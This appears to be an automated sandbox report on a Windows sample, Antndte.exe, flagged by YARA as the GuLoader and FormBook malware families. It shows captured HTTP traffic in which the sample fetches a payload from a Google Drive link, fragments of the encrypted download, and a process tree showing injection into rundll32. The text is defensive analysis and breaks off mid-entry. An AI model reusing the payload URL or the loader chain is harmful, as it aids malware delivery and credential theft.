                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                              HTTPS Proxied Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.11.2050129142.250.80.464432384C:\Users\user\Desktop\Antndte.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2023-12-04 14:22:03 UTC216OUTGET /uc?export=download&id=1YEiS4USubspx63PCPnPvhVVNsu4h-RY3 HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                              Host: drive.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2023-12-04 14:22:03 UTC1732INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 33 20 53 65 65 20 4f 74 68 65 72 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 62 69 6e 61 72 79 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 34 20 44 65 63 20 32 30 32 33 20 31 34 3a 32 32 3a 30 33 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 63 2d 30 6b 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65
                                                                                                                              Data Ascii: HTTP/1.1 303 See OtherContent-Type: application/binaryCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 04 Dec 2023 14:22:03 GMTLocation: https://doc-0c-0k-docs.google


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.11.2050130142.251.41.14432384C:\Users\user\Desktop\Antndte.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2023-12-04 14:22:04 UTC408OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/067j0cfqh00llp67j6c8t9vjf51stn5l/1701699675000/13539573903470379141/*/1YEiS4USubspx63PCPnPvhVVNsu4h-RY3?e=download&uuid=93397b9d-12f9-4f2d-8d03-b765824cb4a8 HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: doc-0c-0k-docs.googleusercontent.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2023-12-04 14:22:04 UTC4462INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 58 2d 47 55 70 6c 6f 61 64 65 72 2d 55 70 6c 6f 61 64 49 44 3a 20 41 42 50 74 63 50 71 68 6e 42 43 38 37 61 52 64 6c 65 76 4f 51 74 5f 69 57 6d 74 38 36 4f 79 6b 42 65 54 6e 33 65 4f 6c 6b 50 2d 32 61 7a 50 69 41 79 6f 36 66 73 4b 34 34 4e 6d 39 4f 66 70 70 49 7a 67 64 66 34 43 6c 78 7a 46 46 31 41 76 6d 79 78 4c 56 39 47 35 6f 48 71 72 42 74 62 79 34 69 43 42 63 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65
                                                                                                                              Data Ascii: HTTP/1.1 200 OKX-GUploader-UploadID: ABPtcPqhnBC87aRdlevOQt_iWmt86OykBeTn3eOlkP-2azPiAyo6fsK44Nm9OfppIzgdf4ClxzFF1AvmyxLV9G5oHqrBtby4iCBcX-Content-Type-Options: nosniffContent-Type: application/octet-streamContent-Disposition: attachment; filename
                                                                                                                              2023-12-04 14:22:04 UTC4462INData Raw: 97 c1 a9 d1 78 7d 41 4c a4 6e df 44 5f b6 18 ea 5d e0 08 bd 77 bd b7 15 f6 8b db 5e 16 8a e0 95 ed fa 99 f8 73 ad de 28 40 50 71 b6 59 06 6a 6e a4 92 7e d3 c1 fe 05 38 0d 70 fa fa 62 4e ab c9 fd 08 cf 1c 8f e4 8d 6e cb b6 b0 cb 25 03 b7 dd ec 89 ef 02 8a ac ed 58 e7 ae c1 d9 8c ce eb e2 31 0d a7 40 b4 80 4f 5d e7 b9 fb 5b 25 c4 3c e7 ee eb a9 4f 2a 04 16 f1 db 7f 21 f2 5c 15 04 47 55 82 6c 34 f7 2b ce 32 40 7a 9d 4d 9c 87 92 6a 65 5d 9d f7 42 69 73 8f 51 c9 47 08 03 74 69 af fe 28 ec f5 09 4a 68 41 ec 22 5c 12 2f 63 cd db 7a 56 54 70 3c 95 9e 9c f9 1a 27 58 0c 7c 63 f3 ad 0b 1c 1d 65 1e 1c 15 ca 9f 9e 6b cc b0 44 4e 00 ba 0b e8 d0 a6 52 9f 6f e9 c0 69 8c 0b b8 28 87 4c 91 12 14 e9 43 9f c4 01 55 4c 46 0c 2c 66 54 82 e7 93 4c 7c a7 24 2d 97 59 ef c0 39 9f
                                                                                                                              Data Ascii: x}ALnD_]w^s(@PqYjn~8pbNn%X1@O][%<O*!\GUl4+2@zMje]BisQGti(JhA"\/czVTp<'X|cekDNRoi(LCULF,fTL|$-Y9
                                                                                                                              2023-12-04 14:22:04 UTC4462INData Raw: a4 14 3b e5 ec ea 99 b2 78 12 ba e9 23 db 3f a5 4a 81 4f c0 13 aa ba 11 1e 7a a6 46 e7 7e 04 a3 05 71 6d 21 9f 89 27 39 23 bf 21 d0 b3 c4 76 47 4c 69 23 69 67 0a c4 95 e1 87 54 26 5b 37 98 52 e0 62 de e8 7d 74 fc 24 9b 04 32 21 e7 d0 e8 01 d4 1b 6a 49 f0 47 91 f9 7f 8d ac 1c 99 2c 2c 9b e4 ed 09 8b 99 f8 bc dc 90 d2 6e cb 63 a8 23 2c 88 7f e6 9d 2e bb 40 7e 86 af 62 c9 26 13 e7 86 41 e8 38 44 e0 1f a9 16 0b 61 aa 08 78 01 58 ae 3e fd 08 f1 e8 53 3a c7 bc bd 5b 71 55 d6 1c 25 ef 01 cc a9 5c 38 25 f4 6d b2 12 3e 9c c7 5c 92 2d 39 43 b4 49 db e1 56 f1 fd 3c ca a6 ec a9 a3 f2 18 c3 48 85 9a 10 2a ea 96 ee e7 89 47 36 68 e5 75 f2 9c f8 a9 3e d0 49 6b 95 15 9b de 77 6e 7c 63 8f 1a 55 4b e6 05 bd 40 7e 54 b1 a2 20 0e 92 82 e8 91 f0 20 f7 f6 7f ba 2e 75 4f 39 cc
                                                                                                                              Data Ascii: ;x#?JOzF~qm!'9#!vGLi#igT&[7Rb}t$2!jIG,,nc#,.@~b&A8DaxX>S:[qU%\8%m>\-9CIV<H*G6hu>Ikwn|cUK@~T .uO9
                                                                                                                              2023-12-04 14:22:04 UTC2673INData Raw: 85 8c 0a de eb ac 96 34 ab 2f ca c6 00 12 22 98 3e 24 b8 02 da a7 81 bb ce c0 e4 d3 01 16 83 96 da e9 09 2f 6f 3c 16 e3 af 1e 39 9d b8 6c ae 2b 03 e0 52 9a f1 0f f0 bd cc b5 7f 9a fd db ad 67 89 4d 06 19 71 ca f0 43 60 1d 70 6e 50 9e 41 d9 8e fb b0 79 84 a0 c9 de bd de ef 2c 30 b9 d7 e5 0f ec af 97 c0 ff 14 04 82 b1 16 52 ba 22 1b e5 e2 00 c4 8c 53 8a 49 26 ef 1b a4 73 8d a0 0c aa e2 dd e7 de 03 c3 33 f2 8b 4e 67 6e 8d 5c 0a 66 77 1d d3 b3 cc 66 2e b5 64 70 30 e6 23 5c 77 a7 a1 26 6d e4 06 e2 31 0d 9c 8a bb cc 85 15 92 41 72 16 e1 4f 71 5b 6b 22 dd 57 92 bb a9 7d 59 88 c8 f1 35 d4 fe 40 d0 57 17 d3 e8 9c 0d 8a 8a 4b d1 bd da eb 72 87 c5 5a ab 3f 09 88 f7 c5 c7 4d a6 91 67 91 cd 01 63 17 8d 5a 5c d5 94 62 78 f3 33 6e 6b 2c d6 8e ea b2 7d e9 53 11 de 6a 50
                                                                                                                              Data Ascii: 4/">$/o<9l+RgMqC`pnPAy,0R"SI&s3Ngn\fwf.dp0#\w&m1ArOq[k"W}Y5@WKrZ?MgcZ\bx3nk,}SjP
                                                                                                                              2023-12-04 14:22:04 UTC1252INData Raw: 8b 7e 32 e5 eb 18 2e 5f 29 02 af aa 94 e1 55 f7 9b ab 76 28 4c 5a 4f 9d 94 35 c6 10 da e9 b2 d6 61 fe 0f bd e3 1a 64 9d 2e 9e 9a bd 38 fc b0 93 66 47 3b 2e 1c 7d 7c 19 87 f2 b5 bd a6 3f 40 4f 7c 07 fd ed db f9 3e 96 be 2c a1 1f 49 39 d2 bf 73 96 eb 3c a8 5e 87 85 f9 b1 bd 67 46 58 48 49 c9 c0 da a5 a8 97 47 b0 37 be cd cc 0a 80 52 78 46 d6 ff 07 12 ae 08 ce 04 03 e2 75 0b d1 6c 5e 99 3e 64 e4 42 c4 b1 9b a0 d2 c8 1f ea 9e 9a 19 53 de ad 9d d5 e9 9f ed ea 86 89 27 3e 9e 7b 57 64 c4 aa 9f 60 c5 87 f1 16 25 cf 48 ca fe 07 86 bd 02 83 68 c1 5e c5 b0 0d 5a d4 ac e8 bc 74 94 0b ce 12 72 30 24 88 8a 6d be ac 24 b6 f0 b1 f7 7f 03 0f 5e ca 46 1f 2e 8c 6c ad 3d e6 1f 38 9f b5 dd d9 b1 5d 1b e2 82 28 79 9e ee de 94 6c 65 52 51 f0 0d e0 02 78 6e 0b 0e 56 c2 44 47 34
                                                                                                                              Data Ascii: ~2._)Uv(LZO5ad.8fG;.}|?@O|>,I9s<^gFXHIG7RxFul^>dBS'>{Wd`%Hh^Ztr0$m$^F.l=8](yleRQxnVDG4
                                                                                                                              2023-12-04 14:22:04 UTC1252INData Raw: 24 9a 49 3d 6a fb b7 e5 12 3c d9 cb 14 11 21 f1 8b 71 d6 48 52 fc b2 c3 31 25 fa 94 71 21 45 f1 7f bf df e8 04 bb b5 de a4 0a d9 42 71 06 db 22 02 df 61 1d 80 99 0c 61 07 cb 56 50 a3 bf 1a 13 f2 f0 9a 1c 8e 94 31 cb e7 0a 4a ab 3a 08 dd 53 58 fa b4 e4 05 d8 3f 0f 19 e4 c7 b8 3f d6 f0 9b 67 91 30 55 d3 05 89 07 03 6b f3 b1 ab f1 ab 97 aa 93 f1 02 55 00 fa 3b ad bb a8 67 88 9a b9 e7 cc bf 9e cc 4b 45 c6 a8 c8 19 b6 b2 78 a5 30 6f 2b a1 87 d0 4f ce 76 f0 71 c7 93 53 c2 8b f8 35 02 45 55 8e fb 96 ea 6e ad 45 c5 8c 7a db b1 ee 20 9e 36 5f c6 fa e1 f1 2a 19 b6 60 c5 a6 56 bb 1b cd 31 0a ee 54 fa 6a 8a 43 01 59 17 4c f1 ba 27 2c 8e 09 2a b0 a9 ae c4 4e be 30 97 d8 05 5b d6 9c 4f 8a 83 c6 42 6b cd 0c 0a af 92 e8 d6 0e f1 2a cd 11 28 2f f7 3b ea f7 41 c5 a8 b2 cd
                                                                                                                              Data Ascii: $I=j<!qHR1%q!EBq"aaVP1J:SX??g0UkU;gKEx0o+OvqS5EUnEz 6_*`V1TjCYL',*N0[OBk*(/;A
                                                                                                                              2023-12-04 14:22:04 UTC1252INData Raw: 73 ca 36 95 dc 41 60 c8 e2 f8 c1 e6 f4 58 89 42 40 10 14 d2 d6 ca 55 17 39 9a fe c7 79 a6 9a cf 65 43 33 96 7a 40 23 3d d5 ab 95 73 75 c1 d0 60 64 56 f4 b6 e8 94 35 b1 9a 69 87 32 49 82 07 44 07 f1 d5 f9 01 da 3c 80 94 34 69 4c dd 29 8f 70 10 7f 81 e7 9d 7f d5 5a 01 7f 5b 6a c0 57 68 60 a1 98 f3 98 5b cf f9 31 81 b5 84 76 91 d3 b7 9c 88 0e eb 11 29 93 1c 91 42 1e a9 0b bc 99 27 6c 67 39 af b1 4a 76 de 51 77 5c 34 2e 75 c9 77 0d 0f 3a 82 bd e5 48 c2 b8 1e a8 3e 73 6c 2b eb 3f cd 0f 0b 71 11 74 be e2 45 ce 7b bf 83 b6 2b 38 08 57 1e 3c de 39 0a d1 ba 18 6a 65 f0 ee fc 44 72 48 2a 43 4e d7 b9 7e c9 07 ab c3 b7 fd c5 bb e4 3e 3f 10 2f 79 68 36 ea e1 0c 19 1f 86 1f 65 94 2f 1d c2 a5 ba 6a 11 82 5b 47 5d 86 1e 6a 7c 3f f0 68 ea 82 6c 52 30 5f 63 02 7a 9a ec 5b
                                                                                                                              Data Ascii: s6A`XB@U9yeC3z@#=su`dV5i2ID<4iL)pZ[jWh`[1v)B'lg9JvQw\4.uw:H>sl+?qtE{+8W<9jeDrH*CN~>?/yh6e/j[G]j|?hlR0_cz[
                                                                                                                              2023-12-04 14:22:04 UTC1252INData Raw: aa 49 79 cf d6 80 51 47 7f c0 9f 41 5d da 32 27 cc 97 ab 45 0e 14 f0 ab d3 2c 0c 21 75 ea 73 4c 90 87 2c 6f 35 ac a7 1a d5 fd 6e e6 22 e8 e8 6f 34 fe 3f 5b bd 7f e9 70 b5 27 5f 9f 31 3b 51 d1 0a ca 24 00 fe 07 20 86 29 02 6f 5e 8d e4 d4 7e 20 2a c3 f4 e9 dc d7 57 a9 a3 75 14 2e f9 7d 29 69 54 c1 fd ec 2d d5 8f ea ec fa e4 99 99 2e e8 84 bd 30 f2 f5 0f f2 44 e9 03 f6 7f 5a ed e6 48 6a df ea eb 4f ea 9b 47 84 84 e7 0d 8c 96 21 c9 f3 92 1b 21 44 08 ff c3 5d d1 ba 01 ca 57 f9 35 e8 8b 2e f3 74 d0 ec f8 44 01 d2 aa 07 d6 f3 c1 6c c8 57 fe 03 28 8d a5 0d 25 a0 f4 2c 1f a0 47 ed 76 59 47 7f 7c ac a3 e6 bf f6 0a 48 ea d5 9d 39 27 00 49 3a 83 83 66 ea 48 4d 37 57 42 81 af c4 51 79 ae 17 63 51 c8 22 f0 2d 41 18 58 50 b0 52 0a eb af ad 73 05 26 f8 e0 15 ca 19 79 6e
                                                                                                                              Data Ascii: IyQGA]2'E,!usL,o5n"o4?[p'_1;Q$ )o^~ *Wu.})iT-.0DZHjOG!!D]W5.tDlW(%,GvYG|H9'I:fHM7WBQycQ"-AXPRs&yn
                                                                                                                              2023-12-04 14:22:04 UTC1252INData Raw: a9 e4 a9 dc 61 d6 60 92 cb 11 fe 50 88 5a c0 33 cb 78 f0 6d b6 61 f3 50 6b 28 58 dd 09 6c 8e 1f 8c ad a3 c5 7b 7a 13 f1 1c ac f8 13 52 33 14 25 93 9e 7b 88 dd b4 4d d9 7a bd 1d ff 99 27 92 ec b4 fa 08 d9 dc fe 8b 5e 1a d9 5f 80 46 0c f4 ea cf 4e 7d 65 2a 3a 7d 2c be e9 7f 03 1d fd 8d d2 0a 60 63 5f 16 9f 32 e7 d1 ef 3e 33 b2 37 51 cd c0 c4 21 93 0d 44 be 84 7c 5a 02 55 0b bd 73 fd 63 49 49 97 35 6a 77 3e 31 99 0a de 7b 60 4d 06 d3 89 84 f2 11 59 ab 05 c9 db c5 3a 4b 8e 49 a9 e2 41 63 b6 03 6f ff 3a 60 e9 d4 c8 7e b0 8c cc 24 0e 90 dc 0a 7e e7 e8 f6 48 d7 3e a5 21 83 8f fa 36 04 88 d2 c7 d4 8a 3a b2 70 9c 82 e6 54 ab ba 7e e2 8e d6 3e d1 9d 41 ce 14 29 af 5a bf e0 c1 2f ac 78 7b 0e 11 75 34 4c 7a d2 7d 86 7c e9 3b d7 b8 6e c3 14 9c ec e0 c4 ba de ae 27 4d
                                                                                                                              Data Ascii: a`PZ3xmaPk(Xl{zR3%{Mz'^_FN}e*:},`c_2>37Q!D|ZUscII5jw>1{`MY:KIAco:`~$~H>!6:pT~>A)Z/x{u4Lz}|;n'M
                                                                                                                              2023-12-04 14:22:04 UTC1252INData Raw: 69 a0 63 9c ef 6b 33 d5 a5 d3 ea 6c 85 9c 55 4d 57 56 26 27 fa 04 5f 29 d4 45 e5 25 82 04 23 bf 17 2c f4 4a b7 f7 10 97 9d 9c 3d bf d1 f5 f1 08 f4 b3 32 2b 43 10 a1 65 f9 da 00 6d 88 9d 43 58 4c 1b 1c 6b c9 89 c3 f3 3e ed bf a6 03 1d e5 bf 3e f4 c3 af c6 a8 3b da 48 1b 63 a0 3b 4e c0 0b 54 ea 44 47 53 ba 32 b9 35 76 c6 d0 db ea cb 56 05 c7 38 13 47 85 6c 6a 79 d6 99 dd 20 76 cd a7 e0 0a 2b 74 9d c5 43 f2 bc 06 db b2 05 4d 6d ec c8 d8 b7 f7 f8 8b cd 39 e6 7f 92 c1 06 4d 5e 3e 8c 75 ea ac 51 ac 27 e1 48 e2 80 0b 56 36 b6 11 ea e4 53 75 8a 4f b6 12 1b 5f bf f7 a0 2f 87 78 fb 02 9c 56 fb bf 2b 88 f5 65 d4 e9 c4 bd 1d 1e da e1 3c 6b 90 ea 2c f1 41 f9 ee 8c ed 01 85 ef ab 19 43 7b f3 04 b8 f8 29 1c e2 37 a2 e0 29 e4 91 bc 23 36 64 3d cf 1e b7 82 87 a7 50 7d cc
                                                                                                                              Data Ascii: ick3lUMWV&'_)E%#,J=2+CemCXLk>>;Hc;NTDGS25vV8Gljy v+tCMm9M^>uQ'HV6SuO_/xV+e<k,AC{)7)#6d=P}


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:0
                                                                                                                              Start time:15:21:30
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Users\user\Desktop\Antndte.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\Desktop\Antndte.exe
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:349'543 bytes
                                                                                                                              MD5 hash:B56BB86C217F7A77D3F862ACF4ECDBE6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.9987160663.0000000000740000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.9988850854.0000000007029000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:2
                                                                                                                              Start time:15:21:53
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Users\user\Desktop\Antndte.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\Desktop\Antndte.exe
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:349'543 bytes
                                                                                                                              MD5 hash:B56BB86C217F7A77D3F862ACF4ECDBE6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:4
                                                                                                                              Start time:15:22:05
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe"
                                                                                                                              Imagebase:0xca0000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:5
                                                                                                                              Start time:15:22:07
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Imagebase:0x870000
                                                                                                                              File size:61'440 bytes
                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:6
                                                                                                                              Start time:15:22:19
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe"
                                                                                                                              Imagebase:0xca0000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:8
                                                                                                                              Start time:15:22:33
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                              Imagebase:0x7ff7df120000
                                                                                                                              File size:597'432 bytes
                                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                              Has elevated privileges:false
